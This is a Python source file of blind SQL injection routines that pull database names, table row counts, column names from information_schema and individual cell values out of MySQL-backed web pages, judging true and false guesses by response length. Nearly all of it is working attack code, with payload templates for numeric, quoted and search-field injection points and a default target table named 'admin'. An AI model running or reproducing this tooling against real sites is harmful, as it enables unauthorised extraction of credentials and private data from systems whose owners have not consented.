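def get_dbname2(url=glovar.url3, cookie=False, type='search', dblength=9):
    """Recover the current database name via boolean-based blind SQL injection.

    Variant of get_dbname() that compares ``substr(database(), n, 1)`` against
    hex-encoded single-character literals (produced by the project helper
    ``glofun.ascii_list_convert_to_hex_list``) instead of ``ascii()`` integers.
    Truth is inferred from the response length: the payload uses ``and``, so a
    true guess returns the normal (larger) page and a false guess a smaller
    one. Two responses within 50 bytes of each other are treated as the same
    outcome, so pages with dynamic content can defeat the heuristic. The
    ``%23`` (``#``) comment terminator is MySQL-specific.

    Args:
        url: Injection point; the payload is appended verbatim, so the URL
            must already end with the vulnerable parameter value.
        cookie: Passed straight through to ``glofun.url_request``.
        type: Context of the injection point: ``'int'`` (bare number),
            ``'string'`` (inside single quotes) or ``'search'`` (closes a
            leading ``'%`` — presumably a LIKE-based search field).
        dblength: Maximum number of characters to recover.

    Returns:
        The recovered name as a string (possibly truncated at ``dblength``,
        or empty when no candidate matched at position 1). The name is still
        printed as before; earlier versions returned None.

    Raises:
        ValueError: if ``type`` is not one of the three supported contexts
            (earlier versions failed later with an unbound ``payload``).
    """
    base = '+and+substr(database(),{dbname_str_localtion},1)={ascii_number}'
    templates = {
        'int': base,
        'string': '\'' + base + '%23',
        'search': '%\'' + base + '%23',
    }
    if type not in templates:
        raise ValueError("type must be 'int', 'string' or 'search', got %r" % (type,))
    payload = templates[type]

    # Candidate characters: a-z, '_', 0-9 as decimal ASCII strings, then
    # converted to MySQL hex literals so no quoting is needed in the payload.
    charset = [str(c) for c in range(97, 123)] + ["95"] + [str(c) for c in range(48, 58)]
    payloads = glofun.ascii_list_convert_to_hex_list(charset)

    def probe(position, candidate):
        """Send one guess and return the length of the response body."""
        full_payload = url + payload.format(dbname_str_localtion=str(position),
                                            ascii_number=str(candidate))
        return len(glofun.url_request(full_payload, cookie))

    dbname = []
    response_length = 0
    # Position 1 doubles as calibration: the largest response seen wins and
    # becomes the baseline ("true" page) for all later positions.
    for candidate in payloads:
        length = probe(1, candidate)
        if length - response_length > 50:
            response_length = length
            dbname = [candidate]

    for position in range(2, dblength + 1):
        for candidate in payloads:
            # Anything no more than 50 bytes shorter than the baseline is
            # taken as true; the first such candidate is accepted.
            if response_length - probe(position, candidate) < 50:
                dbname.append(candidate)
                print(dbname)
                break

    print(dbname)
    result = glofun.ascii_list_convert_to_string(glofun.hex_list_convert_to_dec_list(dbname))
    print(result)
    return result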
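def get_dbname(url=glovar.url3, cookie=False, type='search', dblength=9):
    """Recover the current database name via boolean-based blind SQL injection.

    Injects ``or if(ascii(substr(database(), n, 1))=C, 1, 0)`` for each
    position n and candidate C. With ``or``, a true guess makes the query
    match every row, so the page grows; a false guess leaves it at its normal
    size. Position 1 is calibration: the largest response observed becomes the
    baseline ("true" page), and at later positions the first candidate whose
    response is within 50 bytes of that baseline is accepted. Pages whose size
    varies by more than ~50 bytes between requests will confuse this. The
    ``%23`` (``#``) terminator is MySQL-specific.

    Args:
        url: Injection point; the payload is appended verbatim.
        cookie: Passed straight through to ``glofun.url_request``.
        type: ``'int'``, ``'string'`` or ``'search'`` (see get_dbname2).
        dblength: Maximum number of characters to recover.

    Returns:
        The recovered name (empty if nothing matched at position 1). It is
        still printed as before; earlier versions returned None.

    Raises:
        ValueError: for an unsupported ``type`` (earlier versions failed
            later with an unbound ``payload``).
    """
    base = '+or+if((select+ascii(substr((select+database()),{dbname_str_localtion},1))={ascii_number}),1,0)'
    templates = {
        'int': base,
        'string': '\'' + base + '%23',
        'search': '%\'' + base + '%23',
    }
    if type not in templates:
        raise ValueError("type must be 'int', 'string' or 'search', got %r" % (type,))
    payload = templates[type]

    # Candidate characters: a-z, '_', 0-9 as decimal ASCII codes.
    payloads = [str(c) for c in range(97, 123)] + ["95"] + [str(c) for c in range(48, 58)]

    def build(position, candidate):
        return url + payload.format(dbname_str_localtion=str(position),
                                    ascii_number=str(candidate))

    dbname = ''
    response_length = 0
    for candidate in payloads:
        full_payload = build(1, candidate)
        print(full_payload)  # kept from the original: shows the exact URL sent
        length = len(glofun.url_request(full_payload, cookie))
        if length - response_length > 50:
            # Largest response so far: assume this is the "true" page.
            response_length = length
            dbname = chr(int(candidate))

    for position in range(2, dblength + 1):
        for candidate in payloads:
            length = len(glofun.url_request(build(position, candidate), cookie))
            if response_length - length < 50:
                dbname += chr(int(candidate))
                print(dbname)
                break

    print(dbname)
    return dbname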
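def get_rowcount(url=glovar.url3, cookie=False, type='search', tbname='admin'):
    """Count the rows of ``tbname`` via boolean-based blind SQL injection.

    Injects ``or if((select count(*) from <tbname>)=N, 1, 0)`` for
    N = 0, 1, 2, ... and watches the response length: a true guess makes the
    ``or`` clause match every row so the page grows, and the next (false)
    guess shrinks it again — that drop identifies N as the previous guess.
    Unlike the character extractors in this file there is no 50-byte
    tolerance here: any decrease in length between consecutive probes ends the
    search, so pages with dynamic content can yield a wrong count.

    ``tbname`` is spliced verbatim into the injected SQL (no quoting). That is
    intentional for an attacker-driven tool, but the caller must pass a bare
    identifier.

    (The original comment here about ``substr(({sql}),2,1)`` and counts above
    10 described a different, digit-by-digit technique and did not apply to
    this function, which compares the whole count at once.)

    Args:
        url: Injection point; the payload is appended verbatim.
        cookie: Passed straight through to ``glofun.url_request``.
        type: ``'int'``, ``'string'`` or ``'search'`` (see get_dbname2).
        tbname: Table to count, as a bare SQL identifier.

    Returns:
        The row count when found (also printed, as before), or None when no
        drop in length was observed within 100000 probes. Earlier versions
        only printed the result.

    Raises:
        ValueError: for an unsupported ``type``.
    """
    base = '+or+if((select+count(*)+from+' + tbname + ')={tbcount},1,0)'
    templates = {
        'int': base,
        'string': '\'' + base + '%23',
        'search': '%\'' + base + '%23',
    }
    if type not in templates:
        raise ValueError("type must be 'int', 'string' or 'search', got %r" % (type,))
    payload = templates[type]

    previous_length = 0
    for guess in range(0, 100000):
        full_payload = url + payload.format(tbcount=str(guess))
        length = len(glofun.url_request(full_payload, cookie))
        if previous_length > length:
            # The previous guess produced the larger ("true") page.
            count = guess - 1
            print("table %s row count is %d" % (tbname, count))
            return count
        previous_length = length
    return None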
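def get_columndata(row_order, url=glovar.url3, cookie=False, type='search',
                   tbname='comment', coname='comment_text'):
    """Recover one cell (row ``row_order`` of ``tbname.coname``) via blind SQLi.

    Injects ``or if(ascii(substr((select <coname> from <tbname> limit <row>,1),
    k, 1))=C, 1, 0)`` for each position k and candidate C and infers truth from
    the response length. Position 1 is calibration only: every response more
    than 50 bytes larger than anything seen so far becomes the new baseline
    (assumed "true" page) and its candidate the first character. At later
    positions a response within 50 bytes of the baseline is a match; a
    response more than 50 bytes larger still recalibrates and restarts the
    value from that character, which is how a bad calibration (first character
    outside the candidate set) gets corrected. Candidate ``'0'`` matches
    ``ascii('')``, which is 0 in MySQL, and marks the end of the value.

    The target that used to be hard-coded inside the function is now exposed
    as keyword arguments with the old values as defaults. ``tbname`` and
    ``coname`` are spliced verbatim into the SQL.

    Args:
        row_order: Zero-based row index used in ``limit <row>,1``.
        url, cookie, type: As in get_dbname2.
        tbname: Table to read from, as a bare identifier.
        coname: Column to read, as a bare identifier.

    Returns:
        The recovered string. Earlier versions reset it to ``''`` right before
        returning whenever the terminator was found, so callers always got an
        empty string; the value is now returned (and still printed, together
        with the list of terminated values, as before).

    Raises:
        ValueError: for an unsupported ``type``.
    """
    base = ('+or+if((select+ascii(substr((select+' + coname + '+from+' + tbname
            + '+limit+{data_row_order},1),{data_location},1))={ascii_number}),1,0)')
    templates = {
        'int': base,
        'string': '\'' + base + '%23',
        'search': '%\'' + base + '%23',
    }
    if type not in templates:
        raise ValueError("type must be 'int', 'string' or 'search', got %r" % (type,))
    payload = templates[type]

    # Candidates: 0 (end of string), 32 space, 46 '.', 58 ':', 95 '_',
    # then a-z, 0-9 and A-Z, all as decimal ASCII codes.
    payloads = (["0", "32", "46", "58", "95"]
                + [str(c) for c in range(97, 123)]
                + [str(c) for c in range(48, 58)]
                + [str(c) for c in range(65, 91)])

    def probe(position, candidate):
        """Send one guess and return the length of the response body."""
        full_payload = url + payload.format(data_row_order=str(row_order),
                                            data_location=str(position),
                                            ascii_number=str(candidate))
        return len(glofun.url_request(full_payload, cookie))

    response_length = 0
    single_data = ""
    values = []
    for position in range(1, 35):
        terminated = False
        for candidate in payloads:
            length = probe(position, candidate)
            if length - response_length > 50:
                # Much larger than anything seen so far: treat as the "true"
                # page, recalibrate and restart the value from this character.
                response_length = length
                single_data = chr(int(candidate))
                print(single_data)
            elif response_length - length < 50 and position != 1:
                if candidate == '0':
                    # ascii('') == 0: end of the value.
                    values.append(single_data)
                    print(single_data)
                    terminated = True
                    break
                single_data += chr(int(candidate))
                print(single_data)
        if terminated:
            break

    print(values)
    return single_data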
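def get_coname(url=glovar.url3, cookie=False, type='search', tbname='admin', cocount=3):
    """Recover column names of ``tbname`` from information_schema via blind SQLi.

    For column index i in ``0..cocount-1`` and character position k, injects
    ``or if(ascii(substr((select column_name from information_schema.columns
    where table_name=<hex tbname> limit i,1), k, 1))=C, 1, 0)`` and compares
    the response length with a baseline taken beforehand. The table name is
    hex-encoded by ``glofun.string_convert_to_hex`` so the payload needs no
    quotes. The query does not filter on ``table_schema``, so a table name
    that exists in several databases can yield a mix of their columns.

    Baseline: the largest response observed while probing column 0, position 1
    is assumed to be the "true" page; every later response within 50 bytes of
    it counts as true. If column 0's first character is outside the candidate
    set, the baseline is a "false" page and every guess will appear to match.
    Candidate ``'0'`` matches ``ascii('')`` (0 in MySQL) and ends a name; for a
    column index past the table's columns the subquery is NULL, nothing
    matches, and no name is recorded.

    Fixes relative to the previous version: the first character of every name
    was skipped (the ``k != 1`` guard was copied from get_columndata, where
    position 1 is handled by a separate branch that does not exist here); a
    name not terminated within 34 characters was silently merged into the
    next column's name; and probing now stops at the first matching candidate
    instead of sending every remaining one.

    Args:
        url, cookie, type: As in get_dbname2.
        tbname: Table whose columns to enumerate.
        cocount: Number of column indexes to probe.

    Returns:
        The list of recovered names (also printed, as before).

    Raises:
        ValueError: for an unsupported ``type``.
    """
    hex_tbname = glofun.string_convert_to_hex(tbname)
    base = ('+or+if((select+ascii(substr((select+column_name+from+information_schema.columns+where+table_name='
            + hex_tbname + '+limit+{coname_order_number},1),{coname_str_location},1))={ascii_number}),1,0)')
    templates = {
        'int': base,
        'string': '\'' + base + '%23',
        'search': '%\'' + base + '%23',
    }
    if type not in templates:
        raise ValueError("type must be 'int', 'string' or 'search', got %r" % (type,))
    payload = templates[type]

    # Candidates: 0 (end of string), 95 '_', a-z, 0-9 as decimal ASCII codes.
    payloads = ["0", "95"] + [str(c) for c in range(97, 123)] + [str(c) for c in range(48, 58)]

    def probe(order, position, candidate):
        """Send one guess and return the length of the response body."""
        full_payload = url + payload.format(coname_order_number=str(order),
                                            coname_str_location=str(position),
                                            ascii_number=str(candidate))
        return len(glofun.url_request(full_payload, cookie))

    # Calibrate on column 0, position 1: the largest response is the baseline.
    response_length = 0
    for candidate in payloads:
        length = probe(0, 1, candidate)
        if length - response_length > 50:
            response_length = length

    coname_list = []
    for order in range(0, cocount):
        coname = ""
        for position in range(1, 35):
            matched = None
            for candidate in payloads:
                if response_length - probe(order, position, candidate) < 50:
                    matched = candidate
                    break
            if matched == '0':
                break  # ascii('') == 0: end of this column name
            if matched is None:
                # Character outside the candidate set (or NULL column):
                # skip the position, as the original did, but say so.
                print("no candidate matched column %d position %d" % (order, position))
                continue
            coname += chr(int(matched))
            print(coname)
        if coname:
            coname_list.append(coname)
            print(coname)

    print(coname_list)
    return coname_list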
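def get_single_column_data_by_response_length(self, row_order):
    """Recover one cell (row ``row_order`` of column ``self.coname``) via blind SQLi.

    Uses the instance's pre-built ``self.payload`` template (placeholders
    ``coname``, ``data_row_order``, ``data_location``, ``ascii_number``),
    ``self.url``, ``self.cookie`` and the candidate set ``self.ascii_value``.
    Working state is kept on the module-level ``local_data`` object, as
    before (presumably a ``threading.local`` so concurrent extractions do not
    share it — not verifiable from this file).

    Position 1 is probed against every candidate and the largest response
    becomes the baseline ("true" page); positions 2..34 accept the first
    candidate whose response is within 50 bytes of it, and candidate ``'0'``
    (``ascii('')`` is 0 in MySQL) terminates the value.

    Changes: a value that reaches position 34 without a terminator is now
    returned instead of dropped (``return_data`` stayed ``''``); the dead
    ``k != 1`` check and the never-read ``fuc_start`` timestamp are gone; the
    candidate loop stops at the first match instead of sending the remaining
    probes.

    Args:
        row_order: Zero-based row index substituted into ``data_row_order``.

    Returns:
        The recovered string (also stored in ``local_data.return_data`` and
        printed); ``''`` when nothing matched.
    """
    local_data.row_order = row_order
    local_data.coname = self.coname
    local_data.url_read_length = 0
    local_data.response_length = 0
    local_data.single_data = ''
    local_data.return_data = ''

    def probe(position, candidate):
        """Send one guess; record and return the response length."""
        full_payload = self.url + self.payload.format(
            coname=str(local_data.coname),
            data_row_order=str(local_data.row_order),
            data_location=str(position),
            ascii_number=str(candidate))
        url_read = glofun.url_request(full_payload, self.cookie)
        local_data.url_read_length = len(url_read)
        return local_data.url_read_length

    # Calibration: the largest response at position 1 is the "true" page and
    # its candidate the first character.
    for candidate in self.ascii_value:
        if probe(1, candidate) - local_data.response_length > 50:
            local_data.response_length = local_data.url_read_length
            local_data.single_data = chr(int(candidate))
            print(local_data.single_data)

    for position in range(2, 35):
        matched = None
        for candidate in self.ascii_value:
            if local_data.response_length - probe(position, candidate) < 50:
                matched = candidate
                break
        if matched == '0':
            break  # ascii('') == 0: end of the value
        if matched is not None:
            local_data.single_data += chr(int(matched))
            print(local_data.single_data)

    local_data.return_data = local_data.single_data
    local_data.single_data = ""
    print(local_data.return_data)
    return local_data.return_data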